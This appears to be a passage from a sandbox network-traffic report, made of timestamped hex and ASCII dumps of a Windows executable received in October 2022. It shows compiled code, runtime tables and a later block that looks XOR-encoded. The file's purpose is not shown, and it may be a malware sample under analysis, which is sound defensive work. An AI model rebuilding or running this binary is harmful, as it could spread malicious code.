                                                                                                                2022-10-13 11:08:17 UTC5214INData Raw: 89 02 33 c0 5d c3 8b ff 55 8b ec 8b 45 08 83 c0 20 50 ff 15 0c 30 47 00 5d c3 8b ff 55 8b ec 8b 45 08 83 c0 20 50 ff 15 10 30 47 00 5d c3 8b 01 8b 40 0c 90 c1 e8 0d 24 01 c3 8b ff 55 8b ec 56 8b 75 08 85 f6 75 15 e8 a3 36 00 00 c7 00 16 00 00 00 e8 89 fc ff ff 83 c8 ff eb 52 8b 46 0c 57 83 cf ff 90 c1 e8 0d a8 01 74 39 56 e8 f7 05 00 00 56 8b f8 e8 69 75 01 00 56 e8 dd 53 01 00 50 e8 38 77 01 00 83 c4 10 85 c0 79 05 83 cf ff eb 13 83 7e 1c 00 74 0d ff 76 1c e8 e5 31 01 00 83 66 1c 00 59 56 e8 df 78 01 00 59 8b c7 5f 5e 5d c3 6a 10 68 08 6c 48 00 e8 82 08 fe ff 8b 75 08 89 75 e0 85 f6 75 15 e8 23 36 00 00 c7 00 16 00 00 00 e8 09 fc ff ff 83 c8 ff eb 3c 8b 46 0c 90 c1 e8 0c 56 a8 01 74 08 e8 9c 78 01 00 59 eb e7 83 65 e4 00 e8 0d ff ff ff 59 83 65 fc 00 56
                                                                                                                Data Ascii: 3]UE P0G]UE P0G]@$UVuu6RFWt9VViuVSP8wy~tv1fYVxY_^]jhlHuuu#6<FVtxYeYeV
                                                                                                                2022-10-13 11:08:17 UTC5230INData Raw: 8b 4d 0c 89 0a 8b 4d fc 33 cd e8 49 be fd ff c9 c3 8b ff 55 8b ec 83 ec 1c 53 56 8b 75 0c 8b ce 57 e8 3c 5c 00 00 84 c0 0f 84 e9 01 00 00 8b 1e 8b 7d 08 89 5d ec 8a 0b 8d 43 01 eb 05 8b 06 8a 08 40 57 89 06 0f b6 c1 6a 08 50 88 4d fb e8 6b 5e 00 00 83 c4 0c 85 c0 75 e3 8b 55 10 8a 4d fb 81 c2 08 03 00 00 80 f9 2d 89 55 f0 0f 94 c0 88 02 74 05 80 f9 2b 75 0a 8b 06 8a 08 40 88 4d fb 89 06 80 f9 49 0f 84 62 03 00 00 80 f9 69 0f 84 59 03 00 00 80 f9 4e 0f 84 3d 03 00 00 80 f9 6e 0f 84 34 03 00 00 33 db 88 5d ff 80 f9 30 75 34 8b 3e 8a 07 8d 57 01 88 45 e8 89 16 3c 78 74 13 3c 58 74 0f ff 75 e8 8b ce e8 3d 5b 00 00 8a 4d fb eb 11 8a 0a 8d 42 01 c6 45 ff 01 88 4d fb 89 06 89 7d ec 8b 45 10 8a eb 83 c0 08 89 45 e8 8b f8 80 f9 30 75 11 b5 01 8b 06 8a 08 40 88 4d
                                                                                                                Data Ascii: MM3IUSVuW<\}]C@WjPMk^uUM-Ut+u@MIbiYN=n43]0u4>WE<xt<Xtu=[MBEM}EE0u@M
                                                                                                                2022-10-13 11:08:17 UTC5246INData Raw: ff ff 42 46 89 95 c8 f6 ff ff 3b d1 75 a9 85 db 74 34 83 fe 73 0f 84 04 01 00 00 3b f0 75 11 83 a4 b5 90 fa ff ff 00 8d 46 01 89 85 8c fa ff ff 8b c3 33 db 01 84 b5 90 fa ff ff 8b 85 8c fa ff ff 13 db 46 eb c8 83 fe 73 0f 84 d0 00 00 00 8b 9d cc f6 ff ff 8b b5 dc f6 ff ff 47 3b fb 0f 85 1b ff ff ff 89 85 bc f8 ff ff c1 e0 02 50 8d 85 90 fa ff ff 50 8d 85 c0 f8 ff ff 68 cc 01 00 00 50 e8 ce 1e 00 00 83 c4 10 b0 01 8b 8d bc f8 ff ff 89 8d e4 f6 ff ff 84 c0 0f 84 b2 00 00 00 8b 85 d8 f6 ff ff 2b 85 d0 f6 ff ff 89 85 d8 f6 ff ff 0f 85 6f fc ff ff 8b 9d 5c fc ff ff 8b 95 c0 f6 ff ff 85 d2 0f 84 48 01 00 00 8b 04 95 fc 7d 47 00 89 85 c0 f6 ff ff 85 c0 0f 85 83 00 00 00 50 89 85 d4 f4 ff ff 89 85 bc f8 ff ff 8d 85 d8 f4 ff ff 50 8d 85 c0 f8 ff ff 68 cc 01 00 00
                                                                                                                Data Ascii: BF;ut4s;uF3FsG;PPhP+o\H}GPPh
                                                                                                                2022-10-13 11:08:17 UTC5262INData Raw: 01 8a 01 41 84 c0 75 f9 2b ca 46 03 f1 83 7d f8 01 75 29 8b 45 fc 8d 0c 33 89 8b a8 00 00 00 ff b0 a8 00 00 00 8b 45 f0 2b c6 50 51 e8 92 5b 00 00 83 c4 0c 85 c0 0f 85 0a 04 00 00 8b 45 fc 8b 88 a8 00 00 00 8d 51 01 8a 01 41 84 c0 75 f9 2b ca 8b 55 f8 8d 59 01 8b 4d f4 03 de 83 fa 01 75 15 8b 45 fc 8b 80 ac 00 00 00 89 81 ac 00 00 00 89 b9 b0 00 00 00 8b 75 fc 89 7d e8 81 c6 b4 00 00 00 eb 01 43 f6 c3 01 75 fa 83 fa 01 75 28 8b c3 d1 e8 8d 0c 41 8b 45 ec 89 0c 06 8b 45 f0 ff 36 2b c3 d1 e8 50 51 e8 75 f2 00 00 83 c4 0c 85 c0 0f 85 8f 03 00 00 8b 0e 8d 51 02 66 8b 01 83 c1 02 66 3b c7 75 f5 8b 45 e8 2b ca 8b 55 f8 83 c6 04 d1 f9 8d 1c 4b 8b 4d f4 83 c3 02 40 89 45 e8 83 f8 07 72 9f 8b 75 fc 89 7d e8 81 c6 d0 00 00 00 eb 01 43 f6 c3 01 75 fa 83 7d f8 01 75
                                                                                                                Data Ascii: Au+F}u)E3E+PQ[EQAu+UYMuEu}Cuu(AEE6+PQuQff;uE+UKM@Eru}Cu}u
                                                                                                                2022-10-13 11:08:17 UTC5278INData Raw: 8d 85 30 fe ff ff 50 e8 50 0d 00 00 59 59 84 c0 0f 84 6c 01 00 00 8d 85 50 ff ff ff 50 e8 b1 70 00 00 85 c0 0f 84 58 01 00 00 66 8b 85 30 ff ff ff 66 85 c0 0f 84 87 00 00 00 0f b7 c8 8d 41 bf 83 f8 19 77 03 83 c1 20 6a 38 5a 83 f9 75 75 41 0f b7 8d 32 ff ff ff 8d 41 bf 83 f8 19 77 03 83 c1 20 83 f9 74 75 2a 0f b7 8d 34 ff ff ff 8d 41 bf 83 f8 19 77 03 83 c1 20 83 f9 66 75 13 66 39 95 36 ff ff ff 75 0a 66 83 bd 38 ff ff ff 00 74 29 66 83 bd 36 ff ff ff 2d 0f 85 e3 00 00 00 66 39 95 38 ff ff ff 0f 85 d6 00 00 00 66 83 bd 3a ff ff ff 00 0f 85 c8 00 00 00 b8 e9 fd 00 00 eb 0d 8d 85 50 ff ff ff 50 e8 60 0c 00 00 59 47 0f b7 c0 57 56 89 03 8b 9d 28 fe ff ff 68 83 00 00 00 53 e8 93 e5 00 00 83 c4 10 85 c0 0f 85 b0 00 00 00 8d 8d 50 ff ff ff 8d 51 02 66 8b 01 83
                                                                                                                Data Ascii: 0PPYYlPPpXf0fAw j8ZuuA2Aw tu*4Aw fuf96uf8t)f6-f98f:PP`YGWV(hSPQf
                                                                                                                2022-10-13 11:08:17 UTC5294INData Raw: 01 8b c1 5d c2 04 00 8b ff 56 8b f1 ff 15 88 30 47 00 89 06 8b c6 5e c3 8b ff 56 8b f1 ff 36 e8 60 f2 ff ff 83 26 00 59 5e c3 ff 31 ff 15 8c 30 47 00 c3 83 39 00 0f 95 c0 c3 ff 31 e8 99 bd fe ff 59 c3 ff 31 e8 d8 bd fe ff 59 c3 ff 31 e8 87 bd fe ff 59 c3 8b 41 04 8b 00 ff 30 8b 01 ff 30 e8 69 03 00 00 59 59 c3 8b 01 8b 00 8b 48 48 85 c9 74 18 83 c8 ff f0 0f c1 01 75 0f 81 f9 78 85 48 00 74 07 51 e8 fa f1 ff ff 59 c3 ff 31 e8 8f bd fe ff 59 c3 ff 31 e8 3e bd fe ff 59 c3 ff 31 e8 7d bd fe ff 59 c3 ff 31 e8 2c bd fe ff 59 c3 8b 01 6a 00 ff 30 e8 13 03 00 00 59 59 c3 8b 01 8b 00 8b 40 48 f0 ff 00 c3 ff 31 e8 52 bd fe ff 59 c3 8b ff 55 8b ec 83 ec 14 8b 45 08 33 c9 41 6a 43 89 48 18 8b 45 08 c7 00 60 80 47 00 8b 45 08 89 88 50 03 00 00 8b 45 08 59 6a 05 c7 40
                                                                                                                Data Ascii: ]V0G^V6`&Y^10G91Y1Y1YA00iYYHHtuxHtQY1Y1>Y1}Y1,Yj0YY@H1RYUE3AjCHE`GEPEYj@
                                                                                                                2022-10-13 11:08:17 UTC5310INData Raw: 00 00 00 8b 4d 84 e9 7c fd ff ff 85 d2 7e 25 8b f1 8b 45 b4 8b 0c 85 10 d8 4a 00 8a 04 3b 03 ce 8b 75 dc 03 cb 43 88 44 31 2e 8b 75 d8 3b da 7c e0 8b 75 ac 03 f2 80 7d c8 00 89 75 ac eb 50 85 d2 7e f1 8b 75 d8 8b 45 b4 8b 0c 85 10 d8 4a 00 8a 04 3b 03 ce 88 44 19 2e 43 3b da 7c e8 eb d1 8b 55 b4 8b 4d d8 8a 5d e3 8b 04 95 10 d8 4a 00 88 5c 01 2e 8b 04 95 10 d8 4a 00 80 4c 01 2d 04 46 eb b3 ff 15 88 30 47 00 89 45 a8 38 5d c8 74 0a 8b 45 bc 83 a0 50 03 00 00 fd 8b 45 08 8d 75 a8 8b 4d fc 8b f8 33 cd a5 a5 a5 5f 5e 5b e8 a5 7d fc ff c9 c3 8b ff 55 8b ec 51 53 56 8b 75 08 33 c0 57 8b fe ab ab ab 8b 7d 0c 8b 45 10 03 c7 89 45 fc 3b f8 73 3f 0f b7 1f 53 e8 d8 04 01 00 59 66 3b c3 75 28 83 46 04 02 83 fb 0a 75 15 6a 0d 5b 53 e8 c0 04 01 00 59 66 3b c3 75 10 ff
                                                                                                                Data Ascii: M|~%EJ;uCD1.u;|u}uP~uEJ;D.C;|UM]J\.JL-F0GE8]tEPEuM3_^[}UQSVu3W}EE;s?SYf;u(Fuj[SYf;u
                                                                                                                2022-10-13 11:08:17 UTC5326INData Raw: 80 0f 83 b2 08 00 00 f2 0f 5c e6 f2 0f 5c d4 66 0f 12 25 88 93 47 00 66 0f 54 d9 66 0f 54 e6 f2 0f 5c c2 66 0f 57 d2 ba 60 40 00 00 66 0f c4 d2 03 f2 0f 10 eb f2 0f 59 dc f2 0f 5c f4 f2 0f 5c cd f2 0f 59 da f2 0f 59 ee 66 0f 28 15 a0 f5 47 00 f2 0f 59 e1 f2 0f 2d c3 f2 0f 59 f1 66 0f 28 0d b0 f5 47 00 f2 0f 58 ec 66 0f 70 e6 ee f2 0f 58 ee ba 7f ff 01 00 2b d0 05 ff e1 01 00 0b d0 2d ff e1 01 00 83 fa 00 0f 8e af 05 00 00 03 c8 83 e0 7f 83 e1 80 81 c1 80 ff 01 00 f2 0f 58 e0 f2 0f 10 c3 f2 0f 58 1d 20 93 47 00 66 0f 59 d7 f2 0f 5c 1d 20 93 47 00 66 0f 59 ff f2 0f 5c c3 03 c0 03 c0 03 c0 03 c0 66 0f 28 98 c0 f5 47 00 66 0f 28 35 60 93 47 00 66 0f 59 cf 66 0f 58 d1 66 0f 70 ca ee f2 0f 59 d7 66 0f 57 ff ba 80 3f 00 00 f2 0f 58 d1 66 0f c4 fa 03 f2 0f 58 d4
                                                                                                                Data Ascii: \\f%GfTfT\fW`@fY\\YYf(GY-Yf(GXfpX+-XX GfY\ GfY\f(Gf(5`GfYfXfpYfW?XfX
                                                                                                                2022-10-13 11:08:17 UTC5342INData Raw: 0f c1 06 75 0f 81 fe 78 85 48 00 74 07 56 e8 71 32 ff ff 59 8b 33 89 77 48 89 75 e4 f0 ff 06 c7 45 fc fe ff ff ff e8 05 00 00 00 eb ad 8b 75 e4 6a 05 e8 eb fd fd ff 59 c3 8b c6 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b c9 c3 e8 5f 37 fe ff cc 8b c1 c3 80 3d f0 db 4a 00 00 75 3c c7 05 e8 db 4a 00 78 85 48 00 c7 05 e4 db 4a 00 a0 88 48 00 c7 05 e0 db 4a 00 98 87 48 00 e8 99 44 ff ff 68 e8 db 4a 00 50 6a 01 6a fd e8 0e fe ff ff 83 c4 10 c6 05 f0 db 4a 00 01 b0 01 c3 68 e8 db 4a 00 e8 b6 43 ff ff 50 e8 05 ff ff ff 59 59 c3 a1 e4 db 4a 00 c3 a1 e0 db 4a 00 c3 8b ff 55 8b ec 83 ec 10 56 33 f6 8d 4d f0 56 e8 78 31 fd ff 8b 45 f8 39 70 08 74 03 8b 70 04 80 7d fc 00 74 0a 8b 4d f0 83 a1 50 03 00 00 fd 8b c6 5e c9 c3 8b ff 55 8b ec 68 e8 db 4a 00 e8 5e 43 ff ff 50
                                                                                                                Data Ascii: uxHtVq2Y3wHuEujYMdY_^[_7=Ju<JxHJHJHDhJPjjJhJCPYYJJUV3MVx1E9ptp}tMP^UhJ^CP
                                                                                                                2022-10-13 11:08:17 UTC5358INData Raw: 74 32 8b c1 83 e0 01 c1 e0 04 f6 c1 04 74 03 83 c8 08 f6 c1 08 74 03 83 c8 04 f6 c1 10 74 03 83 c8 02 f6 c1 20 74 03 83 c8 01 f6 c1 02 74 05 0d 00 00 08 00 5d c3 8b ff 55 8b ec 51 51 0f ae 5d fc 8b 45 fc 83 e0 c0 89 45 f8 0f ae 55 f8 8b 4d fc 33 c0 f6 c1 3f 74 32 8b c1 83 e0 01 c1 e0 04 f6 c1 04 74 03 83 c8 08 f6 c1 08 74 03 83 c8 04 f6 c1 10 74 03 83 c8 02 f6 c1 20 74 03 83 c8 01 f6 c1 02 74 05 0d 00 00 08 00 c9 c3 8b ff 55 8b ec 83 ec 10 53 8b 5d 0c 56 57 8b 7d 10 85 ff 0f 84 65 01 00 00 9b d9 7d f8 66 8b 45 f8 0f b7 d0 83 e2 01 c1 e2 04 a8 04 74 03 83 ca 08 a8 08 74 03 83 ca 04 a8 10 74 03 83 ca 02 a8 20 74 03 83 ca 01 a8 02 74 06 81 ca 00 00 08 00 0f b7 f0 8b ce 81 e1 00 0c 00 00 74 2e 81 f9 00 04 00 00 74 20 81 f9 00 08 00 00 74 10 81 f9 00 0c 00 00
                                                                                                                Data Ascii: t2ttt tt]UQQ]EEUM3?t2ttt ttUS]VW}e}fEttt ttt.t t
                                                                                                                2022-10-13 11:08:17 UTC5374INData Raw: 83 e0 40 5d c3 e8 e5 b6 fd ff c7 00 09 00 00 00 e8 cb 7c fd ff 33 c0 5d c3 8b ff 55 8b ec 53 8b 5d 08 f6 c3 18 74 03 83 cb 20 8b c3 c1 e8 05 83 e0 01 f6 c3 10 74 03 83 c8 02 f6 c3 08 74 03 83 c8 04 f6 c3 04 74 03 83 c8 08 56 8b f3 83 e6 01 74 03 83 c8 10 50 e8 86 19 00 00 09 45 0c 8d 45 0c 6a 1f 50 e8 8f 40 00 00 83 c4 0c 85 f6 5e 74 0d e8 79 b6 fd ff c7 00 21 00 00 00 eb 10 f6 c3 1c 74 0b e8 67 b6 fd ff c7 00 22 00 00 00 5b 5d c3 8b ff 55 8b ec 51 53 56 8b 75 08 bb ff 07 00 00 57 0f b7 56 06 8b c2 8b ca c1 e8 04 23 c3 0f b7 f8 66 3b c3 75 26 f6 c2 0f 75 19 33 c0 66 39 46 04 75 11 66 39 46 02 75 0b 66 39 06 75 06 40 e9 bd 00 00 00 6a 02 58 e9 b5 00 00 00 f7 c1 ff 7f ff ff 75 13 33 c0 66 39 46 04 75 0b 66 39 46 02 75 05 66 39 06 74 12 b8 33 04 00 00 2b c7
                                                                                                                Data Ascii: @]|3]US]t tttVtPEEjP@^ty!tg"[]UQSVuWV#f;u&u3f9Fuf9Fuf9u@jXu3f9Fuf9Fuf9t3+
                                                                                                                2022-10-13 11:08:17 UTC5390INData Raw: 08 00 00 74 4c 3d ff 0b 00 00 7c 7d 66 0f f3 ca 3d 32 0c 00 00 7f 0b 66 0f d6 4c 24 04 dd 44 24 04 c3 66 0f 2e ff 7b 24 ba ec 03 00 00 83 ec 10 89 54 24 0c 8b d4 83 c2 14 89 54 24 08 89 54 24 04 89 14 24 e8 c9 db ff ff 83 c4 10 dd 44 24 04 c3 f3 0f 7e 44 24 04 66 0f f3 ca 66 0f 28 d8 66 0f c2 c1 06 3d ff 03 00 00 7c 25 3d 32 04 00 00 7f b0 66 0f 54 05 40 fe 47 00 f2 0f 58 c8 66 0f d6 4c 24 04 dd 44 24 04 c3 dd 05 80 fe 47 00 c3 66 0f c2 1d 60 fe 47 00 06 66 0f 54 1d 40 fe 47 00 66 0f d6 5c 24 04 dd 44 24 04 c3 8b ff 55 8b ec 8b 45 08 8b 4d 0c 21 08 5d c3 8b ff 55 8b ec 57 8b 7d 0c 83 e7 1f 75 07 8b 45 08 21 38 eb 17 56 e8 25 d9 ff ff 57 8b f0 e8 03 d9 ff ff 59 8b 4d 08 23 c6 5e 89 01 33 c0 5f 5d c3 8b ff 55 8b ec 8b 45 08 f7 d0 5d c3 8b ff 55 8b ec 8b 45
                                                                                                                Data Ascii: tL=|}f=2fL$D$f.{$T$T$T$$D$~D$ff(f=|%=2fT@GXfL$D$Gf`GfT@Gf\$D$UEM!]UW}uE!8V%WYM#^3_]UE]UE
                                                                                                                2022-10-13 11:08:17 UTC5406INData Raw: 90 8b 54 24 08 8d 42 0c 8b 4a b4 33 c8 e8 46 fe fa ff b8 1c 50 48 00 e9 c8 13 fb ff 6a 08 ff 75 f0 e8 75 fe fa ff 59 59 c3 cc cc cc cc cc 90 90 8b 54 24 08 8d 42 0c 8b 4a b8 33 c8 e8 17 fe fa ff b8 34 53 48 00 e9 99 13 fb ff 6a 08 ff 75 f0 e8 46 fe fa ff 59 59 c3 cc cc cc cc cc 90 90 8b 54 24 08 8d 42 0c 8b 4a b8 33 c8 e8 e8 fd fa ff b8 3c 47 48 00 e9 6a 13 fb ff 6a 08 ff 75 f0 e8 17 fe fa ff 59 59 c3 cc cc cc cc cc 90 90 8b 54 24 08 8d 42 0c 8b 4a b8 33 c8 e8 b9 fd fa ff b8 bc 55 48 00 e9 3b 13 fb ff 6a 08 ff 75 f0 e8 e8 fd fa ff 59 59 c3 cc cc cc cc cc 90 90 8b 54 24 08 8d 42 0c 8b 4a b8 33 c8 e8 8a fd fa ff b8 c4 49 48 00 e9 0c 13 fb ff 6a 18 ff 75 ec e8 b9 fd fa ff 59 59 c3 8b 45 f0 83 e0 01 0f 84 0c 00 00 00 83 65 f0 fe 8d 4d b8 e9 2c 0d f9 ff c3 8b
                                                                                                                Data Ascii: T$BJ3FPHjuuYYT$BJ34SHjuFYYT$BJ3<GHjjuYYT$BJ3UH;juYYT$BJ3IHjuYYEeM,
                                                                                                                2022-10-13 11:08:17 UTC5422INData Raw: 08 48 00 01 00 00 00 68 56 47 00 02 00 00 00 6c 56 47 00 02 00 00 00 70 56 47 00 01 00 00 00 74 56 47 00 02 00 00 00 78 56 47 00 02 00 00 00 7c 56 47 00 02 00 00 00 80 56 47 00 08 00 00 00 8c 56 47 00 02 00 00 00 68 39 47 00 01 00 00 00 90 56 47 00 02 00 00 00 94 56 47 00 02 00 00 00 d0 4f 47 00 01 00 00 00 98 56 47 00 01 00 00 00 9c 56 47 00 01 00 00 00 a0 56 47 00 03 00 00 00 a4 56 47 00 01 00 00 00 a8 56 47 00 01 00 00 00 ac 56 47 00 01 00 00 00 b0 56 47 00 02 00 00 00 b4 56 47 00 01 00 00 00 b8 56 47 00 02 00 00 00 bc 56 47 00 01 00 00 00 c0 56 47 00 02 00 00 00 c4 56 47 00 01 00 00 00 c8 56 47 00 01 00 00 00 cc 56 47 00 01 00 00 00 d0 56 47 00 02 00 00 00 d4 56 47 00 02 00 00 00 d8 56 47 00 02 00 00 00 dc 56 47 00 02 00 00 00 e0 56 47 00 02 00 00 00
                                                                                                                Data Ascii: HhVGlVGpVGtVGxVG|VGVGVGh9GVGVGOGVGVGVGVGVGVGVGVGVGVGVGVGVGVGVGVGVGVGVG
                                                                                                                2022-10-13 11:08:17 UTC5438INData Raw: 65 76 65 6c 6f 70 65 72 44 69 61 67 6e 6f 73 74 69 63 00 12 00 00 00 41 70 70 50 6f 6c 69 63 79 47 65 74 57 69 6e 64 6f 77 69 6e 67 4d 6f 64 65 6c 00 00 05 00 00 00 10 00 00 00 53 65 74 54 68 72 65 61 64 53 74 61 63 6b 47 75 61 72 61 6e 74 65 65 00 0c 00 00 00 0f 00 00 00 53 79 73 74 65 6d 46 75 6e 63 74 69 6f 6e 30 33 36 00 00 00 00 00 00 00 00 00 38 43 00 00 00 00 00 00 38 43 ff ff ff ff ff ff 0f 00 ff ff ff ff ff ff 0f 00 00 00 00 00 00 00 f0 3f 00 00 00 00 00 00 f0 3f ff ff ff ff ff ff ff 7f ff ff ff ff ff ff ff 7f 31 67 8a e7 7f d8 55 3f bf a0 04 d7 08 6b ac 3f 77 4e ba 6f ab b2 83 3f 8e c5 82 ff bd bf ce 3f ef 39 fa fe 42 2e e6 3f 00 00 00 f8 ff ff ff ff 00 00 00 40 47 15 f7 bf 01 00 00 00 00 00 f0 7f 00 00 00 00 00 00 f0 7f 00 00 00 00 00 00 f0 ff
                                                                                                                Data Ascii: eveloperDiagnosticAppPolicyGetWindowingModelSetThreadStackGuaranteeSystemFunction0368C8C??1gU?k?wNo??9B.?@G
                                                                                                                2022-10-13 11:08:17 UTC5454INData Raw: 00 00 00 40 d6 ef 3f 00 00 00 00 40 d5 ef 3f 00 00 00 00 40 d4 ef 3f 00 00 00 00 40 d3 ef 3f 00 00 00 00 80 d2 ef 3f 00 00 00 00 80 d1 ef 3f 00 00 00 00 80 d0 ef 3f 00 00 00 00 80 cf ef 3f 00 00 00 00 80 ce ef 3f 00 00 00 00 80 cd ef 3f 00 00 00 00 80 cc ef 3f 00 00 00 00 80 cb ef 3f 00 00 00 00 80 ca ef 3f 00 00 00 00 80 c9 ef 3f 00 00 00 00 80 c8 ef 3f 00 00 00 00 80 c7 ef 3f 00 00 00 00 80 c6 ef 3f 00 00 00 00 80 c5 ef 3f 00 00 00 00 80 c4 ef 3f 00 00 00 00 80 c3 ef 3f 00 00 00 00 80 c2 ef 3f 00 00 00 00 80 c1 ef 3f 00 00 00 00 00 10 f0 3f 00 00 00 00 c0 0f f0 3f 00 00 00 00 80 0f f0 3f 00 00 00 00 40 0f f0 3f 00 00 00 00 00 0f f0 3f 00 00 00 00 c0 0e f0 3f 00 00 00 00 80 0e f0 3f 00 00 00 00 40 0e f0 3f 00 00 00 00 00 0e f0 3f 00 00 00 00 c0 0d f0 3f
                                                                                                                Data Ascii: @?@?@?@??????????????????????@????@???
                                                                                                                2022-10-13 11:08:17 UTC5470INData Raw: ba 4a 00 b8 12 48 00 00 00 00 00 01 00 00 00 05 00 00 00 c8 12 48 00 e0 12 48 00 88 12 48 00 9c 25 48 00 f4 24 48 00 a8 24 48 00 00 00 00 00 14 ba 4a 00 04 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 b8 12 48 00 00 00 00 00 00 00 00 00 00 00 00 00 40 ba 4a 00 10 13 48 00 00 00 00 00 01 00 00 00 04 00 00 00 20 13 48 00 34 13 48 00 9c 25 48 00 f4 24 48 00 a8 24 48 00 00 00 00 00 40 ba 4a 00 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 10 13 48 00 00 00 00 00 00 00 00 00 00 00 00 00 68 ba 4a 00 64 13 48 00 00 00 00 00 01 00 00 00 04 00 00 00 74 13 48 00 88 13 48 00 9c 25 48 00 f4 24 48 00 a8 24 48 00 00 00 00 00 68 ba 4a 00 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 64 13 48 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                Data Ascii: JHHHH%H$H$HJ@H@JH H4H%H$H$H@J@HhJdHtHH%H$H$HhJ@dH
                                                                                                                2022-10-13 11:08:17 UTC5486INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ff ff ff ff 41 ff 46 00 00 00 00 00 49 ff 46 00 22 05 93 19 02 00 00 00 c4 52 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ff ff ff ff d7 ff 46 00 00 00 00 00 df ff 46 00 22 05 93 19 02 00 00 00 f8 52 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ff ff ff ff cd 0a 47 00 22 05 93 19 01 00 00 00 2c 53 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 22 05 93 19 06 00 00 00 7c 53 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ff ff ff ff 19 17 47 00 ff ff ff ff 3b 22 42 00 ff ff ff ff 21 17 47 00 02 00 00 00 29 17 47 00 02 00 00 00 31 17 47 00 ff ff ff ff 39 17 47 00 ff ff ff ff
                                                                                                                Data Ascii: AFIF"RHFF"RHG",SH"|SHG;"B!G)G1G9G
                                                                                                                2022-10-13 11:08:17 UTC5502INData Raw: 74 3b 7f e4 01 80 7a f5 02 8f f2 7c 07 93 7e c1 d7 7a 7f e4 03 bb 35 e4 07 99 0c af 07 93 75 8b ac 93 7f e2 21 85 6c e2 3f 61 7f e4 07 93 0c fd 06 93 79 f7 00 93 6e e3 16 96 6e e2 11 fc d2 e4 07 95 10 aa 07 93 75 8b 13 92 7f e2 07 82 78 f5 02 82 79 fd 68 3e 7f e4 01 fc 31 e4 07 99 10 f2 06 93 79 e4 16 94 6e e1 16 95 64 8b aa 93 7f e2 0f bb 79 e4 07 95 10 fc 06 93 79 e4 07 4d 79 f7 0f 93 7f 3a 07 4d 10 e4 16 94 6e e3 68 80 7e e4 01 bb 30 e4 07 99 52 ed 16 94 10 f7 06 93 79 cf 02 e1 ee e6 07 e3 10 f0 06 93 79 e4 16 94 6e e3 68 86 7e e4 01 bb 30 e4 07 99 52 ed 16 94 10 f1 06 93 79 cf 02 e1 ee e6 07 e3 10 f2 06 93 79 e4 16 94 6e e3 68 84 7e e4 01 bb 30 e4 07 99 52 ed 16 94 10 f3 06 93 79 cf 02 e1 ee e6 07 e3 10 fc 06 93 79 e4 07 4f 6e e3 68 84 7e e4 01 e1 ee
                                                                                                                Data Ascii: t;z|~z5u!l?aynnuxyh>1yndyyMy:Mnh~0Ryynh~0Ryynh~0RyyOnh~
                                                                                                                2022-10-13 11:08:17 UTC5518INData Raw: 10 cb 73 ec 00 1d 16 db 0e 6c 80 1b 07 4d 7a c2 07 93 a1 e4 01 80 74 cf 07 82 74 ce 07 93 7f a5 7b 93 7f e4 07 93 7f 8b 07 93 7f af 07 93 7f 5e 07 93 7f e2 07 93 7f fd 07 93 7e e4 07 93 7f d1 07 93 7f 79 07 93 7f 36 07 93 7f e1 07 93 7f f0 07 93 7e e6 07 93 7f c2 07 93 7f 24 07 93 7f 02 07 93 7f e9 07 93 7f e4 07 93 7f e4 07 93 7f f3 07 93 7f 3b 07 93 7f 12 07 93 7f e1 07 93 7f f0 07 93 7e e4 07 93 7f e3 07 93 7f e1 06 93 7f e8 06 93 7f e1 07 93 7f f0 07 93 7e ff 37 97 7f c9 05 93 7f dc 07 93 6e e4 74 50 7f e4 0d 9f 77 fb 0e 1e e7 e4 07 92 5a 34 f6 93 7f e0 2f d9 7f e4 0d e0 34 e4 07 99 10 00 07 93 75 e4 0f 8c 70 69 9f 93 7f e5 22 43 66 e5 07 97 57 ae 07 93 75 97 4c 93 7f ee 68 77 7f e4 0d 93 77 fb 12 1e e7 e4 07 92 5a 34 f0 93 7f e0 2f d9 7f e4 0d e0 34
                                                                                                                Data Ascii: slMztt{^~y6~$;~~7ntPwZ4/4upi"CfWuLhwwZ4/4
                                                                                                                2022-10-13 11:08:17 UTC5534INData Raw: 07 93 79 f5 08 8c 74 69 9f 93 7f e5 22 43 86 e4 07 97 57 ae 07 93 75 97 4c 93 7f ee 68 12 7e e4 0d e6 e9 e4 07 92 10 03 07 93 75 f2 f9 92 6c f4 16 83 53 c8 07 95 6e eb 18 98 f2 7c 07 93 7e c1 d7 6a 7f e4 03 bb 35 e4 07 99 0c af 07 93 75 8b 86 92 7f ee 72 05 7f e4 06 fc 9b e4 07 99 7f e4 07 4d 7a c2 07 93 a1 e4 07 82 71 8b 84 92 7f ee 2a 16 a1 e9 16 9d 53 ec 16 9d 10 f2 07 93 75 e4 db 93 a1 e9 16 9e 53 ec 16 9e 10 f2 07 93 75 e4 db 4d 72 f5 0b bf 77 f5 0b fc 69 e4 07 99 7f 38 07 4d 7a c2 07 93 a1 e4 16 99 68 bc 14 99 6e ee 16 9a f1 8d 38 77 81 1b f8 93 a1 e2 14 82 7f e4 d9 93 79 f7 15 b8 7f f5 15 b9 7f a5 0b 92 7f e4 07 93 7f 4e 07 93 7f 86 07 93 7f e8 06 93 7f e1 07 93 7f f0 07 93 7e e6 07 93 7f 7a 07 93 7f 9b 07 93 7f f9 06 93 7f e9 07 93 7f e4 07 93 7f
                                                                                                                Data Ascii: yti"CWuLh~ulSn|~j5urMzq*SuSuMrwi8Mzhn8wyN~z
